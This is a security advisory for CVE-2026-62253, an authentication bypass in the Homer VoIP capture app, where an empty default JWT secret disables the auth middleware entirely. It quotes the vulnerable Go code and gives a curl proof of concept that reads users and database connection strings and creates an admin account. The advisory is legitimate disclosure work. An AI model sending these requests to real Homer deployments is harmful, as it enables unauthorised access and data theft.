GHSA-rqcc-94gv-wjm9

Suggest an improvement
Source
https://github.com/advisories/GHSA-rqcc-94gv-wjm9
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/10/GHSA-rqcc-94gv-wjm9/GHSA-rqcc-94gv-wjm9.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-rqcc-94gv-wjm9
Aliases
  • CVE-2026-62253
Published
2026-10-07T16:11:58Z
Modified
2026-10-07T16:15:04Z
Severity
  • 9.8 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVSS Calculator
Summary
Homer: Complete Authentication Bypass When coordinator.jwt.secret Is Empty (Default)
Details

Summary

Both JWT middleware functions (JWTMiddleware and JWTMiddlewareV4) immediately return next(c) when jwtSecret == "". The JWT secret defaults to an empty string. On a default installation, all protected API endpoints under /api/v1, /api/v3, and /api/v4 are completely unauthenticated.

Details

coordinator/handlers/auth.go lines 298-304:

func (h *Auth) JWTMiddleware() echo.MiddlewareFunc {
    return func(next echo.HandlerFunc) echo.HandlerFunc {
        return func(c echo.Context) error {
            if h.jwtSecret == "" {
                return next(c)  // bypass — no validation performed
            }

coordinator/handlers/auth_v4_helpers.go lines 177-182:

func (h *Auth) JWTMiddlewareV4() echo.MiddlewareFunc {
    return func(next echo.HandlerFunc) echo.HandlerFunc {
        return func(c echo.Context) error {
            if h.jwtSecret == "" {
                return next(c)  // same bypass

coordinator/coordinator.go lines 315-317:

if c.config.JWT.Secret != "" {
    protected.Use(authHandler.JWTMiddleware())  // middleware not even registered when secret is empty
}

config/config.go line 845: Secret field struct tag has default:"". The example config ships a placeholder value, but the Go struct default (used when no config is provided) is empty.

PoC

# On a default Homer installation (no JWT secret configured), all protected routes are open:
curl http://<homer-host>/api/v3/users
# Returns full user list with no credentials

curl http://<homer-host>/api/v3/databases
# Returns all database connection strings

curl -X POST http://<homer-host>/api/v3/users \
  -H 'Content-Type: application/json' \
  -d '{"username":"attacker","password":"pw","partid":10,"usergroup":"admin"}'
# Creates a new admin user with no credentials

Impact

Missing Authentication for Critical Function (CWE-306). On a default Homer installation with no JWT secret configured, every admin API endpoint is completely unauthenticated. Attackers can read/write all configuration, users, database connections, and stored VoIP call data.

Fix

Fail closed: if JWT.Secret is empty at startup, abort with a fatal error requiring the operator to set a strong secret. Remove the empty-string shortcircuit from both middleware functions:

if h.jwtSecret == "" {
    log.Fatal("coordinator.jwt.secret must be set to a non-empty value")
}

If possible, please apply for a CVE number when posting.

Database specific
{
    "cwe_ids": [
        "CWE-306"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-10-07T16:11:58Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
}
References

Affected packages

Go / github.com/sipcapture/homer-app

Package

Name
github.com/sipcapture/homer-app
View open source insights on deps.dev
Purl
pkg:golang/github.com/sipcapture/homer-app

Affected ranges

Type
SEMVER
Events
Introduced
0 Unknown introduced version / All previous versions are affected
Fixed
0.0.0-20260625093330-5e90809657c9

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/10/GHSA-rqcc-94gv-wjm9/GHSA-rqcc-94gv-wjm9.json"